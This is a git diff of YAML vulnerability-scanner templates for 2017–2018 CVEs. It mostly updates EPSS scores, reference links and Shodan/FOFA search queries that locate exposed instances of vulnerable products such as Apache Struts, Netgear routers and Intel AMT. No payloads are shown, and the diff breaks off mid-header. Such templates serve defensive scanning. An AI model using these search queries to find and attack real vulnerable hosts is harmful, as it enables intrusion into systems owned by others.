a/http/cves/2017/CVE-2017-18487.yaml +++ b/http/cves/2017/CVE-2017-18487.yaml @@ -25,9 +25,9 @@ info: vendor: google_adsense_project product: google_adsense framework: wordpress - publicwww-query: "/wp-content/plugins/adsense-plugin/" shodan-query: http.html:/wp-content/plugins/adsense-plugin/ fofa-query: body=/wp-content/plugins/adsense-plugin/ + publicwww-query: "/wp-content/plugins/adsense-plugin/" tags: cve,cve2017,wordpress,wpscan,wp-plugin,xss,bws-adpush,authenticated,google_adsense_project http: diff --git a/http/cves/2017/CVE-2017-18490.yaml b/http/cves/2017/CVE-2017-18490.yaml index fe6fceb759..9a56af64ac 100644 --- a/http/cves/2017/CVE-2017-18490.yaml +++ b/http/cves/2017/CVE-2017-18490.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18490 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:contact_form_multi:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: contact_form_multi framework: wordpress - publicwww-query: "/wp-content/plugins/contact-form-multi/" shodan-query: http.html:/wp-content/plugins/contact-form-multi/ fofa-query: body=/wp-content/plugins/contact-form-multi/ + publicwww-query: "/wp-content/plugins/contact-form-multi/" tags: cve,cve2017,wordpress,bws-contact-form,wpscan,wp-plugin,xss,authenticated,contact-form-multi,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18491.yaml b/http/cves/2017/CVE-2017-18491.yaml index 647c706979..aaed7649f7 100644 --- a/http/cves/2017/CVE-2017-18491.yaml +++ b/http/cves/2017/CVE-2017-18491.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: contact_form framework: wordpress - publicwww-query: "/wp-content/plugins/contact-form-plugin/" shodan-query: http.html:/wp-content/plugins/contact-form-plugin/ fofa-query: body=/wp-content/plugins/contact-form-plugin/ + publicwww-query: "/wp-content/plugins/contact-form-plugin/" tags: cve,cve2017,wordpress,bws,contact-form,wpscan,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18492.yaml b/http/cves/2017/CVE-2017-18492.yaml index 0e3351d0c6..1a6ff295eb 100644 --- a/http/cves/2017/CVE-2017-18492.yaml +++ b/http/cves/2017/CVE-2017-18492.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: contact_form_to_db framework: wordpress - publicwww-query: "/wp-content/plugins/contact-form-to-db/" shodan-query: http.html:/wp-content/plugins/contact-form-to-db/ fofa-query: body=/wp-content/plugins/contact-form-to-db/ + publicwww-query: "/wp-content/plugins/contact-form-to-db/" tags: cve2017,cve,wordpress,wpscan,bws-contact-form,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18493.yaml b/http/cves/2017/CVE-2017-18493.yaml index 19c0261467..15e432fae8 100644 --- a/http/cves/2017/CVE-2017-18493.yaml +++ b/http/cves/2017/CVE-2017-18493.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18493 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:custom_admin_page:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: custom_admin_page framework: wordpress - publicwww-query: "/wp-content/plugins/custom-admin-page/" shodan-query: http.html:/wp-content/plugins/custom-admin-page/ fofa-query: body=/wp-content/plugins/custom-admin-page/ + publicwww-query: "/wp-content/plugins/custom-admin-page/" tags: cve,cve2017,wordpress,bws-adminpage,wpscan,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18494.yaml b/http/cves/2017/CVE-2017-18494.yaml index 6efe86ae09..47a1fe675a 100644 --- a/http/cves/2017/CVE-2017-18494.yaml +++ b/http/cves/2017/CVE-2017-18494.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: custom_search framework: wordpress - publicwww-query: "/wp-content/plugins/custom-search-plugin/" shodan-query: http.html:/wp-content/plugins/custom-search-plugin/ fofa-query: body=/wp-content/plugins/custom-search-plugin/ + publicwww-query: "/wp-content/plugins/custom-search-plugin/" tags: cve,cve2017,wordpress,bws-custom-search,wpscan,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18496.yaml b/http/cves/2017/CVE-2017-18496.yaml index 6b6cb879c5..35fe3cb310 100644 --- a/http/cves/2017/CVE-2017-18496.yaml +++ b/http/cves/2017/CVE-2017-18496.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18496 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36836 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:htaccess:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: htaccess framework: wordpress - publicwww-query: "/wp-content/plugins/htaccess/" shodan-query: http.html:/wp-content/plugins/htaccess/ fofa-query: body=/wp-content/plugins/htaccess/ + publicwww-query: "/wp-content/plugins/htaccess/" tags: cve,cve2017,wordpress,wpscan,bws-htaccess,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18500.yaml b/http/cves/2017/CVE-2017-18500.yaml index 47d08c7d21..8d4a99c7c6 100644 --- a/http/cves/2017/CVE-2017-18500.yaml +++ b/http/cves/2017/CVE-2017-18500.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: social_buttons_pack framework: wordpress - publicwww-query: "/wp-content/plugins/social-buttons-pack/" shodan-query: http.html:/wp-content/plugins/social-buttons-pack/ fofa-query: body=/wp-content/plugins/social-buttons-pack/ + publicwww-query: "/wp-content/plugins/social-buttons-pack/" tags: cve2017,cve,wordpress,wpscan,bws-social-buttons,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18501.yaml b/http/cves/2017/CVE-2017-18501.yaml index 7af4ac0a0d..7d692fbf75 100644 --- a/http/cves/2017/CVE-2017-18501.yaml +++ b/http/cves/2017/CVE-2017-18501.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: social_login framework: wordpress - publicwww-query: "/wp-content/plugins/social-login-bws/" shodan-query: http.html:/wp-content/plugins/social-login-bws/ fofa-query: body=/wp-content/plugins/social-login-bws/ + publicwww-query: "/wp-content/plugins/social-login-bws/" tags: cve2017,cve,wordpress,wpscan,bws-social-login,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18502.yaml b/http/cves/2017/CVE-2017-18502.yaml index 702e3f5399..58762eefc6 100644 --- a/http/cves/2017/CVE-2017-18502.yaml +++ b/http/cves/2017/CVE-2017-18502.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: subscriber framework: wordpress - publicwww-query: "/wp-content/plugins/subscriber/" shodan-query: http.html:/wp-content/plugins/subscriber/ fofa-query: body=/wp-content/plugins/subscriber/ + publicwww-query: "/wp-content/plugins/subscriber/" tags: cve2017,cve,wordpress,wpscan,bws-subscribers,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18505.yaml b/http/cves/2017/CVE-2017-18505.yaml index 58b79a5aef..8886a3dcd5 100644 --- a/http/cves/2017/CVE-2017-18505.yaml +++ b/http/cves/2017/CVE-2017-18505.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: twitter_button framework: wordpress - publicwww-query: "/wp-content/plugins/twitter-plugin/" shodan-query: http.html:/wp-content/plugins/twitter-plugin/ fofa-query: body=/wp-content/plugins/twitter-plugin/ + publicwww-query: "/wp-content/plugins/twitter-plugin/" tags: cve,cve2017,wordpress,wpscan,bws-twitter,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18516.yaml b/http/cves/2017/CVE-2017-18516.yaml index 3a88b0d928..636ef7d3ee 100644 --- a/http/cves/2017/CVE-2017-18516.yaml +++ b/http/cves/2017/CVE-2017-18516.yaml @@ -26,9 +26,9 @@ info: vendor: bestwebsoft product: linkedin framework: wordpress - publicwww-query: "/wp-content/plugins/bws-linkedin/" shodan-query: http.html:/wp-content/plugins/bws-linkedin/ fofa-query: body=/wp-content/plugins/bws-linkedin/ + publicwww-query: "/wp-content/plugins/bws-linkedin/" tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-linkedin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18517.yaml b/http/cves/2017/CVE-2017-18517.yaml index e73fe4cd1a..4fdcb69d18 100644 --- a/http/cves/2017/CVE-2017-18517.yaml +++ b/http/cves/2017/CVE-2017-18517.yaml @@ -26,9 +26,9 @@ info: vendor: bestwebsoft product: pinterest framework: wordpress - publicwww-query: /wp-content/plugins/bws-pinterest/ shodan-query: http.html:/wp-content/plugins/bws-pinterest/ fofa-query: body=/wp-content/plugins/bws-pinterest/ + publicwww-query: /wp-content/plugins/bws-pinterest/ tags: cve,cve2017,wordpress,wpscan,bws-pinterest,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18518.yaml b/http/cves/2017/CVE-2017-18518.yaml index 460fc36583..9d289105ba 100644 --- a/http/cves/2017/CVE-2017-18518.yaml +++ b/http/cves/2017/CVE-2017-18518.yaml @@ -26,9 +26,9 @@ info: vendor: bestwebsoft product: smtp framework: wordpress - publicwww-query: /wp-content/plugins/bws-smtp/ shodan-query: http.html:/wp-content/plugins/bws-smtp/ fofa-query: body=/wp-content/plugins/bws-smtp/ + publicwww-query: /wp-content/plugins/bws-smtp/ tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-smtp,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18527.yaml b/http/cves/2017/CVE-2017-18527.yaml index f21ed85a11..a49da0c75b 100644 --- a/http/cves/2017/CVE-2017-18527.yaml +++ b/http/cves/2017/CVE-2017-18527.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: pagination framework: wordpress - publicwww-query: "/wp-content/plugins/pagination/" shodan-query: http.html:/wp-content/plugins/pagination/ fofa-query: body=/wp-content/plugins/pagination/ + publicwww-query: "/wp-content/plugins/pagination/" tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-pagination,bws-xss,authenticated,bestwebsoft,xss http: diff --git a/http/cves/2017/CVE-2017-18528.yaml b/http/cves/2017/CVE-2017-18528.yaml index fa245ea667..b6c6f6f9c0 100644 --- a/http/cves/2017/CVE-2017-18528.yaml +++ b/http/cves/2017/CVE-2017-18528.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: pdf_\&_print framework: wordpress - publicwww-query: "/wp-content/plugins/pdf-print/" shodan-query: http.html:/wp-content/plugins/pdf-print/ fofa-query: body=/wp-content/plugins/pdf-print/ + publicwww-query: "/wp-content/plugins/pdf-print/" tags: cve,cve2017,wordpress,wp-plugin,bws-pdf-print,wpscan,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18529.yaml b/http/cves/2017/CVE-2017-18529.yaml index bdf1d39088..1a2b06a0c6 100644 --- a/http/cves/2017/CVE-2017-18529.yaml +++ b/http/cves/2017/CVE-2017-18529.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: promobar framework: wordpress - publicwww-query: /wp-content/plugins/promobar/ shodan-query: http.html:/wp-content/plugins/promobar/ fofa-query: body=/wp-content/plugins/promobar/ + publicwww-query: /wp-content/plugins/promobar/ tags: cve,cve2017,wordpress,wp-plugin,bws-promobar,wpscan,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18530.yaml b/http/cves/2017/CVE-2017-18530.yaml index 2986dfffc1..94ebe90e6e 100644 --- a/http/cves/2017/CVE-2017-18530.yaml +++ b/http/cves/2017/CVE-2017-18530.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: rating framework: wordpress - publicwww-query: "/wp-content/plugins/rating-bws/" shodan-query: http.html:/wp-content/plugins/rating-bws/ fofa-query: body=/wp-content/plugins/rating-bws/ + publicwww-query: "/wp-content/plugins/rating-bws/" tags: cve2017,cve,wordpress,wp-plugin,bws-rating,wpscan,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18532.yaml b/http/cves/2017/CVE-2017-18532.yaml index 19cb52f5d5..5817f23708 100644 --- a/http/cves/2017/CVE-2017-18532.yaml +++ b/http/cves/2017/CVE-2017-18532.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: realty framework: wordpress - publicwww-query: /wp-content/plugins/realty/ shodan-query: http.html:/wp-content/plugins/realty/ fofa-query: body=/wp-content/plugins/realty/ + publicwww-query: /wp-content/plugins/realty/ tags: cve,cve2017,wordpress,wp-plugin,bws-realty,wpscan,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18537.yaml b/http/cves/2017/CVE-2017-18537.yaml index 5c68ef701c..c616e93cc7 100644 --- a/http/cves/2017/CVE-2017-18537.yaml +++ b/http/cves/2017/CVE-2017-18537.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: visitors_online framework: wordpress - publicwww-query: "/wp-content/plugins/visitors-online/" shodan-query: http.html:/wp-content/plugins/visitors-online/ fofa-query: body=/wp-content/plugins/visitors-online/ + publicwww-query: "/wp-content/plugins/visitors-online/" tags: cve,cve2017,wordpress,wp-plugin,bws-visitors-online,wpscan,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18542.yaml b/http/cves/2017/CVE-2017-18542.yaml index 0182d593bc..79165bcafe 100644 --- a/http/cves/2017/CVE-2017-18542.yaml +++ b/http/cves/2017/CVE-2017-18542.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: zendesk_help_center framework: wordpress - publicwww-query: "/wp-content/plugins/zendesk-help-center/" shodan-query: http.html:/wp-content/plugins/zendesk-help-center/ fofa-query: body=/wp-content/plugins/zendesk-help-center/ + publicwww-query: "/wp-content/plugins/zendesk-help-center/" tags: cve,cve2017,wordpress,wp-plugin,bws-zendesk,wpscan,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18556.yaml b/http/cves/2017/CVE-2017-18556.yaml index 417feb4dca..6404cd0920 100644 --- a/http/cves/2017/CVE-2017-18556.yaml +++ b/http/cves/2017/CVE-2017-18556.yaml @@ -26,9 +26,9 @@ info: vendor: bestwebsoft product: google_analytics framework: wordpress - publicwww-query: "/wp-content/plugins/bws-google-analytics/" shodan-query: http.html:/wp-content/plugins/bws-google-analytics/ fofa-query: body=/wp-content/plugins/bws-google-analytics/ + publicwww-query: "/wp-content/plugins/bws-google-analytics/" tags: cve2017,cve,wordpress,wp-plugin,xss,bws-google-analytics,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18557.yaml b/http/cves/2017/CVE-2017-18557.yaml index 1e38c2e008..775237fe4d 100644 --- a/http/cves/2017/CVE-2017-18557.yaml +++ b/http/cves/2017/CVE-2017-18557.yaml @@ -26,9 +26,9 @@ info: vendor: bestwebsoft product: google_maps framework: wordpress - publicwww-query: "/wp-content/plugins/bws-google-maps/" shodan-query: http.html:/wp-content/plugins/bws-google-maps/ fofa-query: body=/wp-content/plugins/bws-google-maps/ + publicwww-query: "/wp-content/plugins/bws-google-maps/" tags: cve,cve2017,wordpress,wp-plugin,xss,bws-google-maps,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18558.yaml b/http/cves/2017/CVE-2017-18558.yaml index fbd0973fd6..570d868792 100644 --- a/http/cves/2017/CVE-2017-18558.yaml +++ b/http/cves/2017/CVE-2017-18558.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: testimonials framework: wordpress - publicwww-query: "/wp-content/plugins/bws-testimonials/" shodan-query: http.html:/wp-content/plugins/bws-testimonials/ fofa-query: body=/wp-content/plugins/bws-testimonials/ + publicwww-query: "/wp-content/plugins/bws-testimonials/" tags: cve2017,cve,wordpress,wp-plugin,xss,bws-testimonials,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18562.yaml b/http/cves/2017/CVE-2017-18562.yaml index 8b35ceb57f..f57c3e4035 100644 --- a/http/cves/2017/CVE-2017-18562.yaml +++ b/http/cves/2017/CVE-2017-18562.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: error_log_viewer framework: wordpress - publicwww-query: "/wp-content/plugins/error-log-viewer/" shodan-query: http.html:/wp-content/plugins/error-log-viewer/ fofa-query: body=/wp-content/plugins/error-log-viewer/ + publicwww-query: "/wp-content/plugins/error-log-viewer/" tags: cve,cve2017,wordpress,wp-plugin,xss,bws-error-log,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18564.yaml b/http/cves/2017/CVE-2017-18564.yaml index 519180be8c..045337c09f 100644 --- a/http/cves/2017/CVE-2017-18564.yaml +++ b/http/cves/2017/CVE-2017-18564.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: sender framework: wordpress - publicwww-query: "/wp-content/plugins/sender/" shodan-query: http.html:/wp-content/plugins/sender/ fofa-query: body=/wp-content/plugins/sender/ + publicwww-query: "/wp-content/plugins/sender/" tags: cve,cve2017,wordpress,wp-plugin,xss,bws-sender,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18565.yaml b/http/cves/2017/CVE-2017-18565.yaml index d7dbdba507..17dfdf8400 100644 --- a/http/cves/2017/CVE-2017-18565.yaml +++ b/http/cves/2017/CVE-2017-18565.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: updater framework: wordpress - publicwww-query: "/wp-content/plugins/updater/" shodan-query: http.html:/wp-content/plugins/updater/ fofa-query: body=/wp-content/plugins/updater/ + publicwww-query: "/wp-content/plugins/updater/" tags: cve2017,cve,wordpress,wp-plugin,xss,bws-updater,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18566.yaml b/http/cves/2017/CVE-2017-18566.yaml index 806074a32d..ca26e14aab 100644 --- a/http/cves/2017/CVE-2017-18566.yaml +++ b/http/cves/2017/CVE-2017-18566.yaml @@ -25,9 +25,9 @@ info: vendor: bestwebsoft product: user_role framework: wordpress - publicwww-query: "/wp-content/plugins/user-role/" shodan-query: http.html:/wp-content/plugins/user-role/ fofa-query: body=/wp-content/plugins/user-role/ + publicwww-query: "/wp-content/plugins/user-role/" tags: cve,cve2017,wordpress,wp-plugin,xss,bws-user-role,wpscan,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index 60c4d50b3c..5ff6843e4a 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -24,7 +24,7 @@ info: epss-percentile: 0.39752 cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: designmodo product: qards framework: wordpress diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index 9c37ceeee1..c54195e14d 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: oracle product: weblogic_server - shodan-query: http.title:"oracle peoplesoft sign-in" + shodan-query: + - http.title:"oracle peoplesoft sign-in" + - product:"oracle weblogic" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" tags: cve,cve2017,rce,oast,hackerone,weblogic,oracle diff --git a/http/cves/2017/CVE-2017-5521.yaml b/http/cves/2017/CVE-2017-5521.yaml index 501f03a2c3..b717a27875 100644 --- a/http/cves/2017/CVE-2017-5521.yaml +++ b/http/cves/2017/CVE-2017-5521.yaml @@ -15,13 +15,14 @@ info: - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2017-5521 - https://www.exploit-db.com/exploits/41205/ + - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-5521 cwe-id: CWE-200 epss-score: 0.97402 - epss-percentile: 0.99914 + epss-percentile: 0.99921 cpe: cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml index fd2a9dce04..1697fe4b00 100644 --- a/http/cves/2017/CVE-2017-5638.yaml +++ b/http/cves/2017/CVE-2017-5638.yaml @@ -29,8 +29,15 @@ info: max-request: 1 vendor: apache product: struts - shodan-query: html:"Apache Struts" - fofa-query: body="struts problem report" + shodan-query: + - html:"Apache Struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + - http.html:"apache struts" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve2017,cve,apache,kev,msf,struts,rce diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index 2bc9106fca..77e5374c5a 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: intel product: active_management_technology_firmware - shodan-query: title:"Active Management Technology" + shodan-query: + - title:"Active Management Technology" + - http.title:"active management technology" fofa-query: title="active management technology" google-query: intitle:"active management technology" tags: cve2017,cve,amt,intel,tenable,kev diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index 0dde2a8972..dbbb5b8d1c 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -13,19 +13,23 @@ info: - https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/ - https://nvd.nist.gov/vuln/detail/CVE-2017-6090 - https://www.exploit-db.com/exploits/42934/ + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2017-6090 cwe-id: CWE-434 epss-score: 0.97204 - epss-percentile: 0.99787 + epss-percentile: 0.99825 cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: phpcollab product: phpcollab - shodan-query: http.title:"PhpCollab" + shodan-query: + - http.title:"PhpCollab" + - http.title:"phpcollab" fofa-query: title="phpcollab" google-query: intitle:"phpcollab" tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml index ac61004431..e78e97079e 100644 --- a/http/cves/2017/CVE-2017-7615.yaml +++ b/http/cves/2017/CVE-2017-7615.yaml @@ -32,7 +32,9 @@ info: max-request: 5 vendor: mantisbt product: mantisbt - shodan-query: http.favicon.hash:662709064 + shodan-query: + - http.favicon.hash:662709064 + - cpe:"cpe:2.3:a:mantisbt:mantisbt" fofa-query: icon_hash=662709064 tags: cve,cve2017,mantisbt,unauth,edb diff --git a/http/cves/2017/CVE-2017-7855.yaml b/http/cves/2017/CVE-2017-7855.yaml index 47974bab8f..81b9d7671d 100644 --- a/http/cves/2017/CVE-2017-7855.yaml +++ b/http/cves/2017/CVE-2017-7855.yaml @@ -23,7 +23,9 @@ info: max-request: 1 vendor: icewarp product: server - shodan-query: title:"icewarp" + shodan-query: + - title:"icewarp" + - http.title:"gotify" fofa-query: title="gotify" google-query: intitle:"gotify" tags: cve,cve2017,xss,icewarp diff --git a/http/cves/2017/CVE-2017-8229.yaml b/http/cves/2017/CVE-2017-8229.yaml index d2bb37a789..ba79e02b15 100644 --- a/http/cves/2017/CVE-2017-8229.yaml +++ b/http/cves/2017/CVE-2017-8229.yaml @@ -21,16 +21,21 @@ info: cvss-score: 9.8 cve-id: CVE-2017-8229 cwe-id: CWE-255 - epss-score: 0.89506 - epss-percentile: 0.98685 + epss-score: 0.93383 + epss-percentile: 0.99075 cpe: cpe:2.3:o:amcrest:ipm-721s_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: amcrest product: ipm-721s_firmware - shodan-query: html:"Amcrest" - fofa-query: "Amcrest" + shodan-query: + - html:"Amcrest" + - http.html:"amcrest" + fofa-query: + - "Amcrest" + - amcrest + - body="amcrest" tags: cve2017,cve,packetstorm,seclists,amcrest,iot http: diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml index 8e9d3f09cd..83e0ef0cc5 100644 --- a/http/cves/2017/CVE-2017-8917.yaml +++ b/http/cves/2017/CVE-2017-8917.yaml @@ -29,7 +29,11 @@ info: max-request: 1 vendor: joomla product: joomla\! - shodan-query: http.component:"Joomla" + shodan-query: + - http.component:"Joomla" + - http.html:"joomla! - open source content management" + - http.component:"joomla" + - cpe:"cpe:2.3:a:joomla:joomla\!" fofa-query: body="joomla! - open source content management" tags: cve2017,cve,joomla,sqli variables: diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index 758a65dd40..e98f690265 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -21,15 +21,14 @@ info: cve-id: CVE-2017-9288 cwe-id: CWE-79 epss-score: 0.00168 - epss-percentile: 0.52791 + epss-percentile: 0.53673 cpe: cpe:2.3:a:raygun:raygun4wp:1.8.0:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: raygun product: raygun4wp framework: wordpress tags: cve2017,cve,wordpress,xss,wp-plugin,raygun - flow: http(1) && http(2) http: diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index 42a93b198d..b3385320e0 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -26,7 +26,9 @@ info: max-request: 2 vendor: odoo product: odoo - shodan-query: cpe:"cpe:2.3:a:odoo:odoo" + shodan-query: + - cpe:"cpe:2.3:a:odoo:odoo" + - http.title:"odoo" fofa-query: title="odoo" google-query: intitle:"odoo" tags: cve2017,cve,odoo,lfi diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index 156f658c9b..d326ebaa1b 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: atlassian product: oauth - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" tags: cve,cve2017,atlassian,jira,ssrf,oast http: diff --git a/http/cves/2017/CVE-2017-9791.yaml b/http/cves/2017/CVE-2017-9791.yaml index e14b2a5a9c..f919847fa7 100644 --- a/http/cves/2017/CVE-2017-9791.yaml +++ b/http/cves/2017/CVE-2017-9791.yaml @@ -29,8 +29,16 @@ info: max-request: 1 vendor: apache product: struts - shodan-query: title:"Struts2 Showcase" - fofa-query: title="Struts2 Showcase" + shodan-query: + - title:"Struts2 Showcase" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + - http.html:"apache struts" + fofa-query: + - title="Struts2 Showcase" + - title="struts2 showcase" + - body="apache struts" + - body="struts problem report" google-query: intitle:"struts2 showcase" tags: cve2017,cve,apache,rce,struts,kev variables: diff --git a/http/cves/2017/CVE-2017-9805.yaml b/http/cves/2017/CVE-2017-9805.yaml index a1ac4bdffd..d34c4ab1e5 100644 --- a/http/cves/2017/CVE-2017-9805.yaml +++ b/http/cves/2017/CVE-2017-9805.yaml @@ -27,8 +27,14 @@ info: max-request: 2 vendor: apache product: struts - shodan-query: http.html:"apache struts" - fofa-query: body="struts problem report" + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve,cve2017,apache,rce,struts,kev diff --git a/http/cves/2018/CVE-2018-0296.yaml b/http/cves/2018/CVE-2018-0296.yaml index 8b46d15dc0..87c54074ee 100644 --- a/http/cves/2018/CVE-2018-0296.yaml +++ b/http/cves/2018/CVE-2018-0296.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-0296 cwe-id: CWE-22,CWE-20 - epss-score: 0.97411 - epss-percentile: 0.99921 + epss-score: 0.97436 + epss-percentile: 0.99942 cpe: cpe:2.3:a:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index c3245382d1..00cb7da979 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-1000226 cwe-id: CWE-732 epss-score: 0.01309 - epss-percentile: 0.8563 + epss-percentile: 0.85899 cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index 